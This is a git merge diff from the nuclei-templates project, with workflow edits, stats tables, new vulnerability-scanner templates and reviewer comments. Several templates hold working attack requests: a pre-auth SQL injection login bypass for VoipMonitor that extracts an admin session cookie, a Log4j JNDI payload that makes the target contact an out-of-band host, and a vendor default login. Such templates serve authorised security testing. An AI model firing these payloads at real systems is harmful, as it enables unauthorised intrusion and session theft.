Merge branch 'projectdiscovery:master' into dashboard
commit
21d872d42c
|
@ -10,23 +10,25 @@ jobs:
|
|||
docs:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@master
|
||||
with:
|
||||
persist-credentials: false
|
||||
fetch-depth: 0
|
||||
token: ${{ secrets.GITHUB_TOKEN }}
|
||||
- uses: actions/checkout@v2
|
||||
|
||||
- uses: actions/setup-go@v2
|
||||
with:
|
||||
go-version: 1.17
|
||||
- name: Get Github tag
|
||||
id: meta
|
||||
run: |
|
||||
echo "::set-output name=tag::$(curl --silent "https://api.github.com/repos/projectdiscovery/nuclei/releases/latest" | jq -r .tag_name)"
|
||||
|
||||
- name: Setup CVE annotate
|
||||
if: steps.meta.outputs.tag != ''
|
||||
env:
|
||||
VERSION: ${{ steps.meta.outputs.tag }}
|
||||
run: |
|
||||
wget -q https://github.com/projectdiscovery/nuclei/releases/download/${VERSION}/cve-annotate.zip
|
||||
sudo unzip cve-annotate.zip -d /usr/local/bin
|
||||
working-directory: /tmp
|
||||
|
||||
- name: Generate CVE Annotations
|
||||
id: cve-annotate
|
||||
run: |
|
||||
if ! which cve-annotate > /dev/null; then
|
||||
echo -e "Command cve-annotate not found! Installing\c"
|
||||
go install github.com/projectdiscovery/nuclei/v2/cmd/cve-annotate@dev
|
||||
fi
|
||||
cve-annotate -i ./cves/ -d .
|
||||
echo "::set-output name=changes::$(git status -s | wc -l)"
|
||||
|
||||
|
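Review bot: The tag lookup in `echo "::set-output name=tag::$(curl --silent "https://api.github.com/repos/projectdiscovery/nuclei/releases/latest" | jq -r .tag_name)"` yields the literal string `null` whenever the API answers with JSON that lacks `tag_name` (an unauthenticated rate-limit or error body), and `null` passes the later `if: steps.meta.outputs.tag != ''` guard, so the next step would fetch `releases/download/null/cve-annotate.zip`. Failing on HTTP errors and mapping a missing field to empty keeps the guard meaningful: `curl -fsSL "https://api.github.com/repos/projectdiscovery/nuclei/releases/latest" | jq -r '.tag_name // empty'`. The same lookup appears in the build workflow hunk ending at L232, where `${VERSION:1}` additionally assumes the tag starts with `v`. The `go install github.com/projectdiscovery/nuclei/v2/cmd/cve-annotate@dev` fallback resolves a moving branch rather than a fixed version; if it is kept, pinning it to a tag makes the docs job reproducible.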
@ -44,4 +46,4 @@ jobs:
|
|||
uses: ad-m/github-push-action@master
|
||||
with:
|
||||
github_token: ${{ secrets.GITHUB_TOKEN }}
|
||||
branch: ${{ github.ref }}
|
||||
branch: ${{ github.ref }}
|
|
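Review bot: `uses: ad-m/github-push-action@master` pins a third-party action, one that receives `github_token: ${{ secrets.GITHUB_TOKEN }}`, to a mutable branch, so any future push to that branch runs inside this workflow with write access to the repository. Pinning to a full commit SHA with the tag in a trailing comment gives a reproducible, reviewable input, e.g. `uses: ad-m/github-push-action@<commit-sha>  # <tag>`. The step this `with:` block belongs to starts before the hunk.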
@ -6,25 +6,17 @@ jobs:
|
|||
build:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@master
|
||||
- uses: actions/checkout@v2
|
||||
|
||||
- name: Get latest Nuclei release version
|
||||
id: nuclei-latest
|
||||
uses: actions/github-script@v5
|
||||
with:
|
||||
result-encoding: string
|
||||
script: |
|
||||
const release = await github.rest.repos.getLatestRelease({
|
||||
owner: 'projectdiscovery',
|
||||
repo: 'nuclei',
|
||||
});
|
||||
|
||||
return release.data.name
|
||||
- name: Get Github tag
|
||||
id: meta
|
||||
run: |
|
||||
echo "::set-output name=tag::$(curl --silent "https://api.github.com/repos/projectdiscovery/nuclei/releases/latest" | jq -r .tag_name)"
|
||||
|
||||
- name: Setup Nuclei
|
||||
if: steps.nuclei-latest.outputs.result != ''
|
||||
if: steps.meta.outputs.tag != ''
|
||||
env:
|
||||
VERSION: ${{ steps.nuclei-latest.outputs.result }}
|
||||
VERSION: ${{ steps.meta.outputs.tag }}
|
||||
run: |
|
||||
wget -q https://github.com/projectdiscovery/nuclei/releases/download/${VERSION}/nuclei_${VERSION:1}_linux_amd64.zip
|
||||
sudo unzip nuclei*.zip -d /usr/local/bin
|
||||
|
|
|
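Review bot: The `wget -q https://github.com/projectdiscovery/nuclei/releases/download/${VERSION}/nuclei_${VERSION:1}_linux_amd64.zip` step installs the archive into `/usr/local/bin` via `sudo unzip nuclei*.zip -d /usr/local/bin` with no integrity check, so the build trusts whatever the `latest` asset contains at fetch time. If the release also publishes a checksum file, downloading it and running `sha256sum -c` before the unzip lets the job fail closed on a tampered or truncated asset; otherwise pinning to a specific release instead of `latest` at least gives a stable input. The `nuclei*.zip` glob would also pick up any stale archive in the working directory; using the exact name `nuclei_${VERSION:1}_linux_amd64.zip` avoids that.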
@ -1,46 +1,3 @@
|
|||
cnvd/2019/CNVD-2019-19299.yaml
|
||||
cnvd/2019/CNVD-2019-32204.yaml
|
||||
cnvd/2021/CNVD-2021-09650.yaml
|
||||
cnvd/2021/CNVD-2021-15824.yaml
|
||||
cnvd/2022/CNVD-2022-03672.yaml
|
||||
cves/2017/CVE-2017-18598.yaml
|
||||
cves/2018/CVE-2018-16716.yaml
|
||||
cves/2018/CVE-2018-18264.yaml
|
||||
cves/2018/CVE-2018-19365.yaml
|
||||
cves/2019/CVE-2019-9726.yaml
|
||||
cves/2020/CVE-2020-35234.yaml
|
||||
cves/2021/CVE-2021-24762.yaml
|
||||
cves/2021/CVE-2021-41192.yaml
|
||||
cves/2021/CVE-2021-44521.yaml
|
||||
cves/2022/CVE-2022-21371.yaml
|
||||
cves/2022/CVE-2022-22536.yaml
|
||||
cves/2022/CVE-2022-22947.yaml
|
||||
cves/2022/CVE-2022-23134.yaml
|
||||
cves/2022/CVE-2022-24124.yaml
|
||||
exposed-panels/casdoor-login.yaml
|
||||
exposed-panels/digitalrebar-login.yaml
|
||||
exposed-panels/directum-login.yaml
|
||||
exposed-panels/homematic-panel.yaml
|
||||
exposed-panels/issabel-login.yaml
|
||||
exposed-panels/librenms-login.yaml
|
||||
exposed-panels/ocs-inventory-login.yaml
|
||||
exposed-panels/phoronix-pane;.yaml
|
||||
exposed-panels/raspberrymatic-panel.yaml
|
||||
exposed-panels/redash-panel.yaml
|
||||
exposed-panels/subrion-login.yaml
|
||||
exposures/configs/prometheus-metrics.yaml
|
||||
misconfiguration/gitlab/gitlab-uninitialized-password.yaml
|
||||
technologies/empirecms-detect.yaml
|
||||
technologies/jeecg-boot-detect.yaml
|
||||
technologies/livehelperchat-detect.yaml
|
||||
technologies/microweber-detect.yaml
|
||||
technologies/php-fusion-detect.yaml
|
||||
technologies/piwigo-detect.yaml
|
||||
technologies/snipeit-panel.yaml
|
||||
technologies/subrion-cms-detect.yaml
|
||||
token-spray/api-launchdarkly.yaml
|
||||
vulnerabilities/cisco/cucm-username-enumeration.yaml
|
||||
vulnerabilities/other/microweber-xss.yaml
|
||||
vulnerabilities/wordpress/dzs-zoomsounds-listing.yaml
|
||||
vulnerabilities/wordpress/wp-adaptive-xss.yaml
|
||||
vulnerabilities/wordpress/wp-qards-listing.yaml
|
||||
cves/2022/CVE-2022-23779.yaml
|
||||
default-logins/digitalrebar/digitalrebar-default-login.yaml
|
||||
vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml
|
||||
|
|
22
README.md
22
README.md
|
@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
|
|||
|
||||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 1025 | daffainfo | 539 | cves | 1031 | info | 1042 | http | 2833 |
|
||||
| panel | 429 | dhiyaneshdk | 405 | exposed-panels | 430 | high | 769 | file | 57 |
|
||||
| lfi | 422 | pikpikcu | 302 | vulnerabilities | 414 | medium | 606 | network | 48 |
|
||||
| xss | 329 | pdteam | 253 | technologies | 217 | critical | 374 | dns | 16 |
|
||||
| wordpress | 324 | geeknik | 174 | exposures | 199 | low | 172 | | |
|
||||
| exposure | 275 | dwisiswant0 | 162 | misconfiguration | 187 | | | | |
|
||||
| rce | 262 | 0x_akoko | 107 | workflows | 185 | | | | |
|
||||
| cve2021 | 245 | gy741 | 106 | token-spray | 146 | | | | |
|
||||
| wp-plugin | 231 | pussycat0x | 102 | default-logins | 75 | | | | |
|
||||
| tech | 229 | princechaddha | 99 | takeovers | 67 | | | | |
|
||||
| cve | 1046 | daffainfo | 544 | cves | 1051 | info | 1064 | http | 2880 |
|
||||
| panel | 441 | dhiyaneshdk | 406 | exposed-panels | 441 | high | 776 | file | 57 |
|
||||
| lfi | 426 | pikpikcu | 313 | vulnerabilities | 417 | medium | 616 | network | 49 |
|
||||
| xss | 333 | pdteam | 255 | technologies | 225 | critical | 384 | dns | 16 |
|
||||
| wordpress | 328 | geeknik | 174 | exposures | 199 | low | 171 | | |
|
||||
| exposure | 275 | dwisiswant0 | 162 | misconfiguration | 188 | | | | |
|
||||
| rce | 267 | 0x_akoko | 111 | workflows | 185 | | | | |
|
||||
| cve2021 | 250 | gy741 | 108 | token-spray | 147 | | | | |
|
||||
| tech | 236 | princechaddha | 106 | default-logins | 74 | | | | |
|
||||
| wp-plugin | 235 | pussycat0x | 104 | takeovers | 67 | | | | |
|
||||
|
||||
**221 directories, 3173 files**.
|
||||
**222 directories, 3221 files**.
|
||||
|
||||
</td>
|
||||
</tr>
|
||||
|
|
File diff suppressed because one or more lines are too long
2641
TEMPLATES-STATS.md
2641
TEMPLATES-STATS.md
File diff suppressed because it is too large
20
TOP-10.md
20
TOP-10.md
|
@ -1,12 +1,12 @@
|
|||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 1025 | daffainfo | 539 | cves | 1031 | info | 1042 | http | 2833 |
|
||||
| panel | 429 | dhiyaneshdk | 405 | exposed-panels | 430 | high | 769 | file | 57 |
|
||||
| lfi | 422 | pikpikcu | 302 | vulnerabilities | 414 | medium | 606 | network | 48 |
|
||||
| xss | 329 | pdteam | 253 | technologies | 217 | critical | 374 | dns | 16 |
|
||||
| wordpress | 324 | geeknik | 174 | exposures | 199 | low | 172 | | |
|
||||
| exposure | 275 | dwisiswant0 | 162 | misconfiguration | 187 | | | | |
|
||||
| rce | 262 | 0x_akoko | 107 | workflows | 185 | | | | |
|
||||
| cve2021 | 245 | gy741 | 106 | token-spray | 146 | | | | |
|
||||
| wp-plugin | 231 | pussycat0x | 102 | default-logins | 75 | | | | |
|
||||
| tech | 229 | princechaddha | 99 | takeovers | 67 | | | | |
|
||||
| cve | 1046 | daffainfo | 544 | cves | 1051 | info | 1064 | http | 2880 |
|
||||
| panel | 441 | dhiyaneshdk | 406 | exposed-panels | 441 | high | 776 | file | 57 |
|
||||
| lfi | 426 | pikpikcu | 313 | vulnerabilities | 417 | medium | 616 | network | 49 |
|
||||
| xss | 333 | pdteam | 255 | technologies | 225 | critical | 384 | dns | 16 |
|
||||
| wordpress | 328 | geeknik | 174 | exposures | 199 | low | 171 | | |
|
||||
| exposure | 275 | dwisiswant0 | 162 | misconfiguration | 188 | | | | |
|
||||
| rce | 267 | 0x_akoko | 111 | workflows | 185 | | | | |
|
||||
| cve2021 | 250 | gy741 | 108 | token-spray | 147 | | | | |
|
||||
| tech | 236 | princechaddha | 106 | default-logins | 74 | | | | |
|
||||
| wp-plugin | 235 | pussycat0x | 104 | takeovers | 67 | | | | |
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CNVD-2019-19299
|
||||
|
||||
info:
|
||||
name: Zhiyuan A8 Arbitrary File Writing to Remote Code Execution
|
||||
name: Zhiyuan A8 Arbitrary File Write (RCE)
|
||||
author: daffainfo
|
||||
severity: critical
|
||||
reference:
|
||||
|
|
|
@ -0,0 +1,56 @@
|
|||
id: CVE-2019-10405
|
||||
|
||||
info:
|
||||
name: Diagnostic page exposed Cookie HTTP header
|
||||
severity: medium
|
||||
author: c-sh0
|
||||
description: Jenkins 2.196 and earlier, LTS 2.176.3 and earlier printed the value of the Cookie on the /whoAmI/ URL
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-10405
|
||||
- https://jenkins.io/security/advisory/2019-09-25/#SECURITY-1505
|
||||
metadata:
|
||||
shodan-query: http.favicon.hash:81586312
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
|
||||
cvss-score: 4.30
|
||||
cve-id: CVE-2019-10405
|
||||
cwe-id: CWE-200
|
||||
tags: cve,cve2019,jenkins
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET {{BaseURL}}/whoAmI/ HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
GET {{BaseURL}}/whoAmI/ HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
req-condition: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'text/html'
|
||||
- 'x-jenkins'
|
||||
condition: and
|
||||
case-insensitive: true
|
||||
|
||||
- type: word
|
||||
part: body_2
|
||||
words:
|
||||
- 'Cookie'
|
||||
- 'JSESSIONID'
|
||||
condition: and
|
||||
|
||||
extractors:
|
||||
- type: kval
|
||||
kval:
|
||||
- x_jenkins
|
|
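Review bot: With `req-condition: true` the unsuffixed `part: header` on the second matcher leaves it unclear which of the two responses is inspected, while the third matcher names `body_2` explicitly; suffixing the header part as well, `part: header_2`, makes the intent unambiguous (assuming the nuclei version in use accepts the suffix for header as it does for body — confirm). A comment on the `raw:` block would also help a reader see why the identical request is sent twice, e.g. `# first request presumably obtains the session cookie; cookie-reuse replays it so body_2 can be checked for the echoed Cookie header`. The template ending at L919 (CVE-2020-2103) has the same structure and would take the same edits.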
@ -0,0 +1,56 @@
|
|||
id: CVE-2020-2103
|
||||
|
||||
info:
|
||||
name: Diagnostic page exposed session cookies
|
||||
severity: medium
|
||||
author: c-sh0
|
||||
description: Jenkins 2.218 and earlier, LTS 2.204.1 and earlier exposed session identifiers on a users detail object in the whoAmI diagnostic page.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-2103
|
||||
- https://www.jenkins.io/security/advisory/2020-01-29/#SECURITY-1695
|
||||
metadata:
|
||||
shodan-query: http.favicon.hash:81586312
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 5.40
|
||||
cve-id: CVE-2020-2103
|
||||
cwe-id: CWE-200
|
||||
tags: cve,cve2020,jenkins
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET {{BaseURL}}/whoAmI/ HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
GET {{BaseURL}}/whoAmI/ HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
req-condition: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'text/html'
|
||||
- 'x-jenkins'
|
||||
condition: and
|
||||
case-insensitive: true
|
||||
|
||||
- type: word
|
||||
part: body_2
|
||||
words:
|
||||
- 'Cookie'
|
||||
- 'SessionId: null'
|
||||
condition: and
|
||||
|
||||
extractors:
|
||||
- type: kval
|
||||
kval:
|
||||
- x_jenkins
|
|
@ -0,0 +1,49 @@
|
|||
id: CVE-2021-4191
|
||||
|
||||
info:
|
||||
name: GitLab GraphQL API User Enumeration
|
||||
author: zsusac
|
||||
severity: medium
|
||||
description: A remote, unauthenticated attacker can use this vulnerability to collect registered GitLab usernames, names, and email addresses.
|
||||
reference:
|
||||
- https://www.rapid7.com/blog/post/2022/03/03/cve-2021-4191-gitlab-graphql-api-user-enumeration-fixed/
|
||||
- https://thehackernews.com/2022/03/new-security-vulnerability-affects.html
|
||||
classification:
|
||||
cvss-metrics: CVSS:5.3/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||
cvss-score: 5.3
|
||||
cve-id: CVE-2021-4191
|
||||
cwe-id: CWE-359
|
||||
tags: cve,cve2021,gitlab,api,graphql,enum,unauth
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /api/graphql HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/json
|
||||
Accept: */*
|
||||
Origin: {{RootURL}}
|
||||
Referer: {{RootURL}}/-/graphql-explorer
|
||||
|
||||
{"query":"# Welcome to GraphiQL\n#\n# GraphiQL is an in-browser tool for writing, validating, and\n# testing GraphQL queries.\n#\n# Type queries into this side of the screen, and you will see intelligent\n# typeaheads aware of the current GraphQL type schema and live syntax and\n# validation errors highlighted within the text.\n#\n# GraphQL queries typically start with a \"{\" character. Lines that starts\n# with a # are ignored.\n#\n# An example GraphQL query might look like:\n#\n# {\n# field(arg: \"value\") {\n# subField\n# }\n# }\n#\n# Keyboard shortcuts:\n#\n# Prettify Query: Shift-Ctrl-P (or press the prettify button above)\n#\n# Run Query: Ctrl-Enter (or press the play button above)\n#\n# Auto Complete: Ctrl-Space (or just start typing)\n#\n\n{\n users {\n nodes {\n id\n name\n username\n }\n }\n}","variables":null,"operationName":null}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"data"'
|
||||
- '"users"'
|
||||
- '"nodes"'
|
||||
- '"id"'
|
||||
- 'gid://'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
extractors:
|
||||
- type: json
|
||||
json:
|
||||
- '.data.users.nodes[].username'
|
|
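Review bot: `cvss-metrics: CVSS:5.3/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N` puts the score where the vector's version prefix belongs; the other CVE templates in this commit use `CVSS:3.1/…`, and the numeric score already sits in `cvss-score: 5.3`, so the line should read `cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N`. The request body also carries the whole GraphiQL welcome comment inside the query string, which adds nothing to the check; reducing it to the actual document, `{"query":"{ users { nodes { id name username } } }","variables":null,"operationName":null}`, makes the template easier to audit.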
@ -0,0 +1,27 @@
|
|||
id: CVE-2022-0692
|
||||
|
||||
info:
|
||||
name: Rudloff alltube prior to 3.0.1 - Open Redirect
|
||||
author: 0x_Akoko
|
||||
severity: medium
|
||||
description: Open Redirect on Rudloff/alltube in Packagist rudloff/alltube prior to 3.0.1
|
||||
reference:
|
||||
- https://huntr.dev/bounties/4fb39400-e08b-47af-8c1f-5093c9a51203/
|
||||
- https://www.cvedetails.com/cve/CVE-2022-0692
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2022-0692
|
||||
cwe-id: CWE-601
|
||||
tags: cve,cve2022,redirect,rudloff,alltube
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/index.php/example.com'
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
part: header
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
|
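Review bot: The only matcher is the `Location` regex, so there is no status check and no `matchers-condition`; a redirect finding is more robust with a 3xx status matcher AND-ed with the regex, which also rules out a non-redirect response that happens to carry a `Location` header. The regex itself is left as is.
```yaml
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 301
          - 302

      # … unchanged: Location regex matcher …
```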
@ -53,7 +53,7 @@ requests:
|
|||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "400 Bad Request" # error in concatenated response
|
||||
- "500 Internal Server Error"
|
||||
- "500 Dispatching Error"
|
||||
- "HTTP/1.0 400 Bad Request" # error in concatenated response
|
||||
- "HTTP/1.0 500 Internal Server Error"
|
||||
- "HTTP/1.0 500 Dispatching Error"
|
||||
condition: or
|
||||
|
|
|
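Review bot: The new words hard-code an `HTTP/1.0` status line (`"HTTP/1.0 400 Bad Request"` and the two `500` variants), so a backend that answers the concatenated request with `HTTP/1.1` would no longer match where the previous unprefixed words did; if the protocol version is not fixed by the target, a regex matcher such as `- 'HTTP/1\.[01] (400 Bad Request|500 (Internal Server|Dispatching) Error)'` keeps the tightening without that dependency. The enclosing request block starts before the hunk, so the context behind the `# error in concatenated response` comment cannot be checked here.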
@ -0,0 +1,43 @@
|
|||
id: CVE-2022-23779
|
||||
|
||||
info:
|
||||
name: Zoho ManageEngine - Internal Hostname Disclosure
|
||||
author: cckuailong
|
||||
severity: medium
|
||||
description: Zoho ManageEngine Desktop Central before 10.1.2137.8 exposes the installed server name to anyone. The internal hostname can be discovered by reading HTTP redirect responses.
|
||||
reference:
|
||||
- https://www.manageengine.com/products/desktop-central/cve-2022-23779.html
|
||||
- https://github.com/fbusr/CVE-2022-23779
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-23779
|
||||
metadata:
|
||||
fofa-query: app="ZOHO-ManageEngine-Desktop"
|
||||
tags: cve,cve2022,zoho,exposure
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/themes"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 301
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- '/themes/'
|
||||
- 'text/html'
|
||||
condition: and
|
||||
|
||||
- type: dsl
|
||||
dsl:
|
||||
- '!contains(location,host)'
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: header
|
||||
group: 1
|
||||
regex:
|
||||
- 'https?:\/\/(.*):'
|
|
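Review bot: This template names a CVE in `id:` and `tags:` but has no `classification:` block, unlike the other CVE templates in this commit (cvss-metrics, cvss-score, cve-id, cwe-id); `cve-id: CVE-2022-23779` can be added from what is on the page, with the vector, score and CWE taken from the NVD entry already listed under `reference:` (leave `<value from NVD>` placeholders until confirmed). The DSL matcher `'!contains(location,host)'` is the actual disclosure check and deserves a comment, e.g. `# redirect target names a host other than the one scanned, i.e. the internal server name`.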
@ -0,0 +1,47 @@
|
|||
id: CVE-2022-24260
|
||||
|
||||
info:
|
||||
name: VoipMonitor - Pre-Auth SQL injection
|
||||
author: gy741
|
||||
severity: critical
|
||||
description: A SQL injection vulnerability in Voipmonitor GUI before v24.96 allows attackers to escalate privileges to the Administrator level.
|
||||
reference:
|
||||
- https://kerbit.io/research/read/blog/3
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-24260
|
||||
- https://www.voipmonitor.org/changelog-gui?major=5
|
||||
metadata:
|
||||
shodan-query: http.title:"VoIPmonitor"
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 9.80
|
||||
cve-id: CVE-2022-24260
|
||||
cwe-id: CWE-89
|
||||
tags: cve,cve2022,voipmonitor,sqli,unauth
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /api.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept: */*
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
module=relogin&action=login&pass=nope&user=a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null; #
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '"success":true'
|
||||
- '_vm_version'
|
||||
- '_debug'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
extractors:
|
||||
- type: kval
|
||||
kval:
|
||||
- PHPSESSID
|
|
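Review bot: The `kval` extractor writes `PHPSESSID` — the session issued on a successful match — into the scan output, so result files and any pipeline that stores them end up holding live administrator session identifiers for affected hosts; the word matchers on `'"success":true'`, `'_vm_version'` and `'_debug'` already establish the finding, so the extractor can be dropped or, if the value is needed for triage, marked as sensitive. A comment above `extractors:` such as `# NOTE: extracted value is a live session cookie; treat scan output as sensitive` would at least make the handling explicit.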
@ -0,0 +1,40 @@
|
|||
id: digitalrebar-default-login
|
||||
|
||||
info:
|
||||
name: RackN Digital Rebar provision default login
|
||||
author: c-sh0
|
||||
severity: high
|
||||
reference: https://docs.rackn.io/en/latest/doc/faq-troubleshooting.html?#what-are-the-default-passwords
|
||||
tags: rackn,digitalrebar,default-login
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /api/v3/users HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Authorization: Basic {{base64(username + ':' + password)}}
|
||||
|
||||
payloads:
|
||||
username:
|
||||
- rocketskates
|
||||
password:
|
||||
- r0cketsk8ts
|
||||
|
||||
attack: pitchfork
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: regex
|
||||
part: header
|
||||
regex:
|
||||
- '(?i)(X-Drp-)'
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'Name'
|
||||
- 'Secret'
|
||||
condition: and
|
|
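Review bot: `reference:` is a bare scalar here while the CVE templates added in this commit use a list (`reference:` followed by `- https://…`); writing it as `reference:` / `  - https://docs.rackn.io/en/latest/doc/faq-troubleshooting.html#what-are-the-default-passwords` keeps the schema uniform, and the `?#` in the URL is an empty query string before the fragment that can be dropped. A one-line `description:` stating what the check confirms (that the documented default credentials still authenticate against `/api/v3/users`) would match the sibling templates as well.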
@ -1,32 +1,39 @@
|
|||
id: jenkins-detect
|
||||
|
||||
info:
|
||||
name: Jenkins detect (version)
|
||||
author: philippdelteil,daffainfo
|
||||
name: Jenkins Detection
|
||||
author: philippdelteil,daffainfo,c-sh0
|
||||
severity: info
|
||||
reference:
|
||||
- https://www.jenkins.io/doc/book/using/remote-access-api/#RemoteaccessAPI-DetectingJenkinsversion
|
||||
- https://github.com/jenkinsci/jenkins/pull/470
|
||||
- https://www.jenkins.io/doc/book/security/access-control/permissions/#access-granted-without-overallread
|
||||
metadata:
|
||||
shodan-query: http.favicon.hash:81586312
|
||||
tags: tech,jenkins
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
- "{{BaseURL}}/whoAmI/"
|
||||
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "X-Jenkins"
|
||||
- "X-Jenkins-Session"
|
||||
part: header
|
||||
condition: and
|
||||
words:
|
||||
- "x-jenkins"
|
||||
case-insensitive: true
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "<title>Dashboard [Jenkins]</title>"
|
||||
part: body
|
||||
- "Jenkins"
|
||||
|
||||
extractors:
|
||||
- type: kval
|
||||
part: header
|
||||
kval:
|
||||
- x_jenkins
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: cucm-username-enumeration
|
||||
|
||||
info:
|
||||
name: Cisco Unified Call Manager (CUCM) User Data Services Username Enumeration API - Unauthenticated
|
||||
name: Cisco Unified Call Manager Username Enumeration
|
||||
author: manasmbellani
|
||||
severity: medium
|
||||
reference: https://www.n00py.io/2022/01/unauthenticated-dumping-of-usernames-via-cisco-unified-call-manager-cucm/
|
||||
|
|
|
@ -0,0 +1,41 @@
|
|||
id: vrealize-operations-log4j-rce
|
||||
|
||||
info:
|
||||
name: vRealize Operations Tenant App Log4j JNDI RCE
|
||||
author: bughuntersurya
|
||||
severity: critical
|
||||
description: A critical vulnerability in Apache Log4j identified by CVE-2021-44228 has been publicly disclosed that may allow for remote code execution in an impacted vRealize Operations Tenant Application.
|
||||
reference: https://www.vmware.com/security/advisories/VMSA-2021-0028.html
|
||||
metadata:
|
||||
shodan-query: http.title:"vRealize Operations Tenant App"
|
||||
tags: rce,log4j,vmware,vrealize
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /suite-api/api/auth/token/acquire HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/json
|
||||
Origin: {{RootURL}}
|
||||
Referer: {{RootURL}}/ui/
|
||||
|
||||
{"username":"${jndi:ldap://${hostName}.{{interactsh-url}}}","password":"admin"}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "dns" # Confirms the DNS Interaction
|
||||
|
||||
- type: regex
|
||||
part: interactsh_request
|
||||
regex:
|
||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: interactsh_request
|
||||
group: 1
|
||||
regex:
|
||||
